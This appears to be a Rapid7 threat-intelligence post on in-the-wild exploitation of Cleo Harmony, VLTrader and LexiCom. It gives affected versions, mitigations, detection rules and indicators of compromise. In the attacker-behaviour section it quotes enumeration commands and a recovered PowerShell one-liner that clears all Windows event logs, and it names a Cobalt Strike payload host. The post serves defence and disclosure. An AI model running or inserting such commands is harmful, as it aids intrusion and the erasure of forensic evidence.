Widespread Exploitation of Cleo File Transfer Software (CVE-2024-55956)

Last updated at Sun, 15 Dec 2024 19:55:08 GMT

On Monday, December 9, multiple security firms began privately circulating reports of in-the-wild exploitation targeting Cleo file transfer software. Late the evening of December 9, security firm Huntress published a blog on active exploitation of three different Cleo products (docs):

• Cleo VLTrader, a server-side solution for “mid-enterprise organizations”
• Cleo Harmony, which provides file transfer capabilities for “large enterprises”
• Cleo LexiCom, a desktop-based client for communication with major trading networks  

Huntress’s blog noted that the exploitation they were seeing across Cleo products resulted from an insufficient patch for CVE-2024-50623, a vulnerability disclosed in Cleo VLTrader, Cleo Harmony, and Cleo LexiCom in October 2024. Cleo indicated that the vulnerability was fixed in version 5.8.0.21 of all three solutions, but according to Huntress, 5.8.0.21 remained vulnerable to exploitation. CVE-2024-50623 was initially listed as a cross-site scripting issue in NVD (CWE-79) but was modified to reflect CWE-434 (unrestricted file upload) as the root cause after this blog was published.

New critical vulnerability and exploitation (December 10)

On December 10, Cleo evidently communicated with customers acknowledging a new critical vulnerability in Cleo Harmony, VLTrader, and LexiCom "that could allow an unauthenticated user to import and execute arbitrary bash or PowerShell commands on the host system by leveraging the default settings of the Autorun directory." As of December 13, CVE-2024-55956 has been assigned to this issue.

As of December 10, Rapid7 MDR has confirmed successful exploitation of this issue (CVE-2024-55956) in customer environments; similar to Huntress, our team has observed enumeration and post-exploitation activity and is investigating multiple incidents. Rapid7 also has an analysis of a modular Java backdoor dropped as part of this campaign.

File transfer software continues to be a target for adversaries, and for financially motivated threat actors in particular. Rapid7 recommends taking emergency action to mitigate risk related to this threat.

Affected products

According to the vendor, the following products and versions are vulnerable to CVE-2024-50623. (Note: While the below reflects official vendor stance, it's contradicted by Huntress's analysis that 5.8.0.21 was not, in fact, fully patched for CVE-2024-50623.)

• Cleo Harmony prior to version 5.8.0.21
• Cleo VLTrader prior to version 5.8.0.21
• Cleo LexiCom prior to version 5.8.0.21

Cleo's advisory for the new issue (now CVE-2024-55956) was updated to indicate that a patch is available for all affected products — it's unclear exactly when the update occurred. The patch appears to have been released December 11.

The following versions are vulnerable to CVE-2024-55956:

• Cleo Harmony prior to version 5.8.0.24
• Cleo VLTrader prior to version 5.8.0.24
• Cleo LexiCom prior to version 5.8.0.24

Note: Release notes for the fix for CVE-2024-55956, which Rapid7 researchers pulled directly from the patched version of the software, appear to be dated December 9 despite the fact that no patch was known to be available at that time. Per the release notes, the patch "addresses a critical vulnerability which exploits the ability for unrestricted file upload and download and execute malicious host definitions in the product. After applying the patch, errors are logged for any files found at startup related to this exploit, and those files are removed."

Mitigation guidance

Cleo customers should update to the latest version of affected products immediately. Rapid7 still recommends removing affected products from the public internet and ensuring they are behind a firewall wherever possible. Disabling Cleo’s Autorun directory, which allows command files to be automatically processed, may also prevent the latter part of the attack chain from being executed.

Indicators of compromise and post-exploitation observations from Rapid7 MDR are available at the end of this blog; Huntress’s blog also has several descriptions of post-exploitation activity, including attack chain artifacts, commands run, and files dropped for persistence. Rapid7 recommends that affected customers review these indicators and investigate their environments for suspicious activity dating back to at least December 3, 2024.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to both CVE-2024-50623 and CVE-2024-55956 on Windows with an authenticated vulnerability check available in the Tuesday, December 10 content release.

The following Query Builder queries can also help identify Cleo products in your environment:

• software.vendor = 'Cleo Communications' AND software.product = 'Harmony'
• software.vendor = 'Cleo Communications' AND software.product = 'VLTrader'
• software.vendor = 'Cleo Communications' AND software.product = 'LexiCom'
• software.vendor CONTAINS 'Cleo'

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of rules deployed and alerting on behavior related to this threat:

• Suspicious Process - XORed Data in PowerShell
• Suspicious Process - PowerShell System.Net.Sockets.TcpClient
• Attacker Behavior - Possible Cleo MFT Exploitation 2024
• Attacker Tool - PowerShell -noni -ep -nop Flags
• Attacker Behavior - Obfuscated Powershell Script Containing -noni -ep -nop Flags
• Suspicious Process - Powershell Invoke-WebRequest

Rapid7 Labs has also released a Velociraptor artifact to help detect exploitation of Cleo software.

Rapid7-observed attacker behavior

Network IOCs:
89.248.172[.]139
176.123.10[.]115
185.162.128[.]133
185.163.204[.]137
185.181.230[.]103
45.182.189[.]102 - Cobalt Strike server
45.182.189[.]102/dpixel (payload location)

Post-exploitation behavior
In multiple attack chains, after initial exploitation, the adversary executed the following enumeration commands via cmd to gather user, group and system information from the impacted system and display domain trust relationships.

systeminfo

net group /domain

whoami

wmic logicaldisk get name,size

nltest /domain_trusts

In addition, across multiple incidents, Rapid7 identified the usage of the Java-based RAT (e.g., cleo.1234) to spawn a PowerShell instance with the command line powershell.exe -NonInteractive -Command -. The PowerShell instance was then used to run a script that functions as a shellcode loader. After AES decryption and execution, the shellcode embedded within the script reaches out to the Cobalt Strike server 45.182.189[.]102 over HTTP. The shellcode within the PowerShell script acts as a stager, and ultimately downloads, decrypts, loads, and executes a 64-bit Cobalt Strike beacon DLL from the server. From one decrypted Cobalt Strike beacon, acquired from 45.182.189[.]102, Rapid7 extracted the license ID 1580103824.

During analysis of the PowerShell script, Rapid7 recovered a function that is capable of clearing the Windows event logs if the executing process is a member of the Administrators group. Despite the script executing under the SYSTEM user however, Rapid7 did not observe usage of the function, which allowed for the recovery and analysis of the script.

$mkpfaejh85 = [bool](([Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544");if ($mkpfaejh85) { start-Process 'powershell' '-c "&{Get-EventLog -LogName *|ForEach{Clear-EventLog $_.Log}}"' -nonewwindow; };

Rapid7 also observed post-exploitation activity in the form of an "OverPass-The-Hash" attack, in which the adversary leverages the NTLM hash of an account to obtain a Kerberos ticket that can be used to access additional network resources within the impacted environment.

MITRE ATT&CK Enterprise Techniques

Updates

Dec. 10, 2024: Updated wording to clarify that there are now two vendor advisories — the original advisory for CVE-2024-50623, which still indicates that versions prior to 5.8.0.21 are vulnerable; and the new advisory with "CVE pending," which specifies versions of affected software prior to and including 5.8.0.21 are vulnerable to a new issue (presumably the patch bypass).

Dec. 11, 2024: Updated to reflect InsightVM check availability and to note that the CWE assigned to CVE-2024-50623 has been changed to CWE-434 in NVD. Updated with Rapid7-observed attacker behavior and indicators.

Dec. 12, 2024: Updated to reflect patch availability for the CVE-pending critical vulnerability in Cleo Harmony, LexiCom, and VLTrader. Also updated to clarify the difference between advisories for the two discrete vulnerabilities (CVE-2024-50623 and CVE-2024-55956). Added link to Rapid7's analysis of a Java backdoor dropped during exploitation.

Dec. 13, 2024: Updated with CVE ID (CVE-2024-55956) throughout.

Dec. 15, 2024: Updated with additional IOCs and Rapid7-observed attacker behavior.